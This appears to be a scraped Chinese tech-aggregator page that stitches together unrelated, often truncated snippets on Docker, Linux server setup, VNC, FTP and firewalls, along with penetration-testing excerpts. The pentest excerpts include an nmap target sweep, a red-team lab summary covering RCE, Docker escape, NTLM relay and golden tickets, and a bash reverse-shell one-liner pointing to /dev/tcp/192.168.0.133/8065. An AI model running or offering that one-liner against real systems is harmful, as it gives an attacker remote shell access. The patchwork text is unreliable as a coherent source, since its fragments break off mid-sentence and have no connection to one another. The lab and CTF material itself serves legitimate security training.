随着以Docker和Kubernetes为核心的云原生技术的快速发展,当前越来越多的应用、中间件、甚至数据库均开始进行云化改造,以适应快速上云的IT需求。
docker中部署nginx, 然后nginx中部署静态资源文件, 上网搜了下, 觉得的搜到的文章讲的不是很清晰, 所以自己写一篇.
通过nmap -sn 192.18.128.0/16扫描当前网络中运行的机器获取到靶机ip192.18.128.1
docker image ls 是列出已经下载下来的镜像, 列表包含了仓库名、标签、镜像ID、创建时间以及所占用的空间。
Centos安装docker yum install docker-io -y 获取新镜像: docker pull ubuntu #获取ubuntu 运行镜像: docker run -i -t -p 80:80 ubuntu /bin/bash #-p为端口映射,80映射到80。 查看所有镜像: docker images 杀死所有running状态的容器: docker kill $(docker ps -q) 删除所有已经停止的容器: docker rm $(docker ps -a -q) 删除所
Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。(注:一个关于如何安装的视频教程已经可以访问在Virtual Box Host中安装Metasploitable 2
海外Linux服务器推荐安装BBR或者TCPA(目前仅centos系统测试成功) BBR: 📷 📷 新机器使用前,先安装BBR加速,网站性能提高80%以上 📷 会长君 21年3月21日 喜欢:0 浏览:456 TCPA: 📷 📷 CentOS7系统安装和启动腾讯TCPA单边拥堵算法过程 📷 会长君 21年6月5日 喜欢:0 浏览:62
继续docker的学习之旅,今天练习一些常用的命令: 一、镜像相关 1.1 列出本机所有镜像 docker images 后面的操作,都以ubuntu做为练习的目标。 另外:如果某些镜像文件不想要了,
实现ubuntu 系统桌面级别的远程连接,需要在ubuntu 系统中安装vnc,既然是桌面,前提是需要ubuntu 带有图形化界面,如果没有,可以执行以下命令安装图形化界面
Netcat 是个多用途的网络工具,可以用于在 Kali 中执行多个信息收集和扫描任务。这个秘籍展示了如何使用 Netcat 获取服务特征,以便识别和开放端口相关的服务。
更新 : @snakeliwei 的提醒, 现在的docker有了专门清理资源(container、image、网络)的命令。 docker 1.13 中增加了docker system prune的命令,针对container、image可以使用docker container prune、docker image prune命令。
4.添加官方密钥 执行该命令时,如遇到长时间没有响应说明网络连接不到docker网站,需要使用代-理进行。
Dockerfile 就是将在文件中书写的构建指令,一层一层从 FROM 指定的基础镜像使用临时容器过渡,逐层叠加起来最终生成目标镜像
UFW或简单防火墙是iptables的一个接口,旨在简化配置防火墙的过程。虽然iptables是一个可靠而灵活的工具,但初学者很难学会如何使用它来正确配置防火墙。如果您希望开始保护网络,并且您不确定使用哪种工具,UFW可能是您的正确选择。
FTP是文件传输协议的缩写,是一种曾经广泛用于在客户端和服务器之间移动文件的网络协议。它已被更快,更安全,更方便的文件传输方式所取代。许多休闲网民希望直接从他们的网页浏览器用https下载,而且命令行用户更加喜欢使用的安全协议,如scp或SFTP
今天在帮群里一个小伙伴解决如题所说的问题时,才发现果然phpmyadmin有毒,好久没有使用mysql命令了,忘得都七七八八了。 通常情况下,遇到这个问题,先看端口是否正确,有些配置为了安全,更改了端口,比如mysql的3306改成3307或者8010等等…… 命令 mysql -u root -p 输入密码,进去后查看端口是否正确: 输入 show global variables like 'port' 端口没错,账号和密码也没错。排除上述问题,猜测防火墙问题。 1、安装iptables防火墙 ps:如
本次多层网络域渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含Laravel Debug mode RCE(CVE-2021-3129)漏洞利用,Docker逃逸,Redis未授权访问漏洞,SSH密钥利用,非约束委派和约束委派,NTLM中继攻击,SMB Relay攻击,哈希传递,黄金票据和白银票据,CVE-2020-1472提权等等。
在前面我们学习了docker镜像相关的知识,接下来再来学习另一个核心概念---容器。容器是镜像的一个运行实例,所不同的是,镜像是静态的只读文件,而容器则是带有运行时需要的可写文件层,同时容器中的应用进程处于运行状态。
前一篇云原生|关于K8s中Ingress和Egress流量的那些事儿是一个方案,针对Ingress流量响应的方案,里边涉及到了Linux的知识点和Kubernetes的知识点。
水文警告⚠😂,最近这些玩意用得多,微微记录一下,目前写的比较水,后面应该会补点实践经验🚩。
镜像标签可以理解为版本号。比如我们项目demo的版本是1.5.1,那么标签可以是:
Q:TCP/IP协议 OSI七层模型 最普遍的问题 是查看工程师基础是否扎实 A:(应用层 传输层 网络层 数据链路层) (应用层 会话层 表示层 传输层 网络层 数据链路层 物理层)
在这篇文章里,我们将要一睹能快速分析文本数据(如日志,报告等)的最方便工具。很多时候,我们需要的数据并不存储在我们的本机上。所以首先,我们要知道如何链接到远程服务器上并使用它。为此,使用SSH最为合适。(SSH,即Secure Shell,是一个加密网络协议,它能让你在一个不安全的网络上安全地远程登陆和使用其他网络服务) 在Ubuntu的终端你可以用以下几个命令之一来登陆远程服务器。 $ ssh user@host $ ssh -p port host 通过密钥链接: $ ssh -i key.pem us
VNC或“虚拟网络计算”是一种连接系统,允许您使用键盘和鼠标与远程服务器上的图形桌面环境进行交互。它使得对于不熟悉命令行的用户更容易管理远程服务器上的文件,软件和设置。
Docker 使用了 Linux 内核 iptables 和 IPVS 的功能来实现服务发现和负载均衡。
Hack The Box是一个CTF挑战靶机平台,在线渗透测试平台。它能帮助你提升渗透测试技能和黑盒测试技能,它包含了一些不断更新的挑战,其中有模拟真实世界场景,也有倾向于CTF风格的挑战。
Docker 允许你在容器内运行应用程序, 使用 docker run 命令来在容器内运行一个应用程序。
说明:FrpMgr是一个基于Frp的快速配置Web面板,可以一键配置生成客户端的Frp配置文件,远程安装Frp服务到任意一台服务器,让我们在使用配置Frp上方便很多。对于类似这种带Web面板的穿透工具,之前也发过不少,比如nps、lanproxy等,都挺不错的,有兴趣可以去了解下,这里就介绍下FrpMgr安装及使用。
解决nginx: [emerg] bind() to [::]:80 failed (98: Address already in use)的方法如下:
仓库注册服务器 Registry :存放多个仓库 仓库 Repository :存放一类镜像的多个版本 镜像 Image:可供下载 只读 容器 Container:镜像下载后的实例化 可写
We are proud to announce our first client: Sparklays (Sparklays.com still under construction)
为了写这个教程,专程新买了一台服务器来做教学和演示。 文章来源:https://zouaw.com/
下载 官网:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html
本教程介绍如何在Ubuntu系统上安装和配置众所周知的、安全的VsFTPD(非常安全的文件传输协议守护程序)服务器。FTP或文件传输协议是一种常见的网络协议,用于在两台计算机之间传输文件或将文件从桌面传输到您的网站或web托管服务器。这些文件可以根据用户在FTP服务器上拥有的权限进行上传和下载。
这里直接使用漏扫工具检测struts2有无漏洞,这里发现存在S2-045、S2-046两个漏洞
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
MongoDB确实躺枪了,因为这事的责任当然不在数据库,而在于使用数据库的人没有做必要的安全配置。
Xshell是最好的远程管理软件,没有之一,支持中文,家庭用户完全免费,它支持保存ip、用户名和密码(Public KEY也可以,也就是俗称的公钥),支持各种自定义功能(字体、布局、以及公钥的生成)相当方便。
Goby:bash -c 'exec bash -i &>/dev/tcp/192.168.0.133/8065 <&1'
云主机 操作系统:Ubuntu Server 14.04.1 LTS 32位 CPU:1核 内存:1GB 系统盘:20GB(本地磁盘) 数据盘:0GB 公网带宽:1Mbps
点击上方“芋道源码”,选择“设为星标” 管她前浪,还是后浪? 能浪的浪,才是好浪! 每天 10:33 更新文章,每天掉亿点点头发... 源码精品专栏 原创 | Java 2021 超神之路,很肝~ 中文详细注释的开源项目 RPC 框架 Dubbo 源码解析 网络应用框架 Netty 源码解析 消息中间件 RocketMQ 源码解析 数据库中间件 Sharding-JDBC 和 MyCAT 源码解析 作业调度中间件 Elastic-Job 源码解析 分布式事务中间件 TCC-Transaction
配置 web 192.168.205.130 192.168.150.132 win7 192.168.205.128 DC 192.168.205.131 kali攻击机 192.168.150.128
1.1 Docker 的基本概念 1.2 为什么使用 Docker 1.3 Docker 体系结构简介 1.4 Docker 容器技术的应用场景
Neo4j(Nosql之一)是一个高性能的图数据库(不支持分布式), 在社交关系中经常用到。关于Neo4j的介绍,网上多的是, 故不再赘述。来简要说说安装:
由于文档资料越来越多,将所有资料都存放在自己的电脑上容易混淆,并且也不利于分享。这种情况下,考虑将资料上传SVN统一管理,这样一来其他人也能很方便的查略各种资料。
请参考: 《第 1 篇 新学习路线、视频介绍、资料下载》 《第二章 资源下载方法》
Docker 镜像仓库地址: 地址的格式⼀般是 <域名/IP>[:端口号], 默认地址是 Docker Hub。仓库名: 这里的仓库名是两段式名称, 即 <用户名>/<软件名>。 对于 Docker Hub, 如果不给出用户名,则默认为 library, 也就是官方镜像。 比如:
经典云计算架构包括 IaaS(Infrastructure as a Service,基础设施即服务)、PaaS(Platform as a Service,平台即服务)、SaaS(Software as a Service,软件即服务)三层服务,如下图所示。
领取专属 10元无门槛券
手把手带您无忧上云